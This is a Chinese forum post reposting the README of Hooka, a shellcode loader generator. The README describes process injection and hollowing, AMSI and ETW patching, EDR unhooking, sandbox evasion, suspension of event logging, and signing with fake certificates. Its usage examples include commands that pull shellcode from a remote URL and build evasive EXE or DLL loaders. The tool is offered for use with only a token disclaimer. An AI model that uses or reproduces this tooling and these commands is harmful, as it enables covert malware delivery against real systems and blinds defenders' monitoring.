找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 10|回复: 0

test3

[复制链接]

8

主题

4

回帖

130

积分

管理员

积分
130
发表于 2025-4-10 22:39:31 | 显示全部楼层 |阅读模式

Hooka

Shellcode loader generator with multiples features

Coded with 💙 by D3Ext

IntroductionFeaturesUsageLibraryDisclaimer

# Introduction Hooka is able to generate shellcode loaders with multiple capabilities. It is also based on other tools like [BokuLoader](https://github.com/boku7/BokuLoader), [Freeze](https://github.com/optiv/Freeze) or [Shhhloader](https://github.com/icyguider/Shhhloader), and it tries to implement more evasion features. Why in Golang? Although it's not the perfect language for malware dev, it works perfectly for testing purposes. Obviously if you want something professional and foolproof you should create your own loader in C++, C# or similars. # Features This tool is able to generate loaders with this features: - Multiple shellcode injection techniques: - SuspendedProcess - ProcessHollowing - NtCreateThreadEx - EtwpCreateEtwThread - NtQueueApcThreadEx - No-RWX - Get shellcode from raw file, PE, DLL or from a URL - EXE and DLL are supported as output loader formats - Encrypt shellcode using: - AES - 3DES - RC4 - XOR - AMSI and ETW patching (enabled by default) - Random variables and function names - Shikata Ga Nai obfuscation (see [here](https://github.com/EgeBalci/sgn)) - Multiple ways to detect sandboxing - Check if username and computer name match before running - Enable ACG Guard protection - Block non-Microsoft signed DLLs from injecting into created processes - Capable of unhooking user-mode hooks via multiple techniques: - Classic - Full DLL - Perun's Fart technique - ***Phant0m*** technique to suspend EventLog threads (see [here](https://github.com/hlldz/Phant0m)) - Windows API hashing (see [here](https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware)) - Sign shellcode loader with fake or real certificates - Strings obfuscation via Caesar cipher (see [here](https://en.wikipedia.org/wiki/Caesar_cipher)) - Compress code weight using Golang compile and UPX (if it's installed) - Compute binary entropy of the loader - Compute MD5, SHA1 and SHA256 checksums to keep track of the loader # Installation Just clone the repository like this: ```sh git clone https://github.com/D3Ext/Hooka cd Hooka make ``` After that you will find the binary under the `build/` folder # Usage > Help panel ``` Usage of Hooka: REQUIRED: -i, --input string payload to inject in raw format, as PE, as DLL or from a URL -o, --output string name of output file (i.e. loader.exe) -f, --format string format of the payload to generate (available: exe, dll) (default exe) EXECUTION: --proc string process to spawn (in suspended state) when needed for given execution technique (default notepad.exe) --exec string technique used to load shellcode (default "SuspendedProcess"): SuspendedProcess ProcessHollowing NtCreateThreadEx EtwpCreateEtwThread NtQueueApcThreadEx No-RWX AUXILIARY: -a, --arch string architecture of the loader to generate (default amd64) -c, --cert string certificate to sign generated loader with (i.e. cert.pfx) -d, --domain string domain used to sign loader (i.e. www.microsoft.com) ENCODING: --enc string encrypts shellcode using given algorithm (available: aes, 3des, rc4, xor) (default none) --sgn use Shikata Ga Nai to encode generated loader (it must be installed on path) --strings obfuscate strings using Caesar cipher EVASION: --unhook string unhooking technique to use (available: full, peruns) --sandbox enable sandbox evasion --no-amsi don't patch AMSI --no-etw don't patch ETW --hashing use hashes to retrieve function pointers --user string proceed only when the user running the loader is the expected (i.e. DESKTOP-E1D6G0A\admin) --computername string proceed only when the computer name is the expected (i.e. DESKTOP-E1D6G0A) --acg enable ACG Guard to prevent AV/EDR from modifying existing executable code --blockdlls prevent non-Microsoft signed DLLs from injecting in child processes --phantom suspend EventLog threads using Phant0m technique. High privileges needed, otherwise loader skips this step --sleep delay shellcode execution using a custom sleep function EXTRA: --calc use a calc.exe shellcode to test loader capabilities (don't provide input file) --compress compress generated loader using Golang compiler and UPX if it's installed -r, --rand use a random set of parameters to create a random loader (just for testing purposes) -v, --verbose enable verbose to print extra information -h, --help print help panel Examples: hooka -i shellcode.bin -o loader.exe hooka -i http://192.168.1.126/shellcode.bin -o loader.exe hooka -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg hooka -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose ``` > Generate a simple EXE loader ```sh $ hooka_linux_amd64 -i shellcode.bin -o loader.exe ``` > Generate a DLL loader ```sh $ hooka_linux_amd64 -i shellcode.bin -o loader.dll -f dll ``` > Use custom config (various examples) ```sh $ hooka_linux_amd64 -i shellcode.bin -o loader.exe --hashing --agc --sleep --verbose $ hooka_linux_amd64 -i shellcode.bin -o loader.exe --exec ProcessHollowing --sgn --strings --blockdlls $ hooka_linux_amd64 -i http://xx.xx.xx.xx/shellcode.bin --sandbox --sleep --domain www.microsoft.com --verbose $ hooka_linux_amd64 --calc -o loader.exe --user "DESKTOP-E1D6G0A\tom" --computername "DESKTOP-E1D6G0A" --compress --strings ``` # Demo # TODO - ~~Check username and hostname before running~~ - Add direct and indirect syscall - Add Chacha20 cypher to encrypt shellcode # Library The official Golang package has most of the already mentioned features and some others. To make use of it, see [here](https://github.com/D3Ext/Hooka/tree/main/examples) and [here](https://github.com/D3Ext/Hooka/tree/main/pkg/hooka) # References You can take a look at some of the mentioned techniques here: ``` https://github.com/C-Sto/BananaPhone https://github.com/timwhitez/Doge-Gabh https://github.com/Ne0nd0g/go-shellcode https://github.com/optiv/Freeze https://github.com/f1zm0/acheron https://github.com/Enelg52/OffensiveGo https://github.com/trickster0/TartarusGate https://github.com/Kara-4search/HookDetection_CSharp https://github.com/RedLectroid/APIunhooker https://github.com/plackyhacker/Peruns-Fart https://github.com/rasta-mouse/TikiTorch https://github.com/phra/PEzor https://github.com/S1ckB0y1337/Cobalt-Strike-CheatSheet https://github.com/chvancooten/maldev-for-dummies https://blog.sektor7.net/#!res/2021/perunsfart.md https://teamhydra.blog/2020/09/18/implementing-direct-syscalls-using-hells-gate/ https://www.ired.team/offensive-security/defense-evasion/detecting-hooked-syscall-functions#checking-for-hooks https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++ https://www.ired.team/offensive-security/defense-evasion/retrieving-ntdll-syscall-stubs-at-run-time https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware https://winternl.com/detecting-manual-syscalls-from-user-mode/ ``` # Disclaimer Use this project under your own responsability! The author is not responsible of any bad usage of the project. # License This project is under [MIT](https://github.com/D3Ext/Hooka/blob/main/LICENSE) license Copyright © 2025, *D3Ext* 原Github地址:https://github.com/D3Ext/Hooka
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|Nmaps Club

GMT+8, 2025-4-19 07:52 , Processed in 0.119536 second(s), 26 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表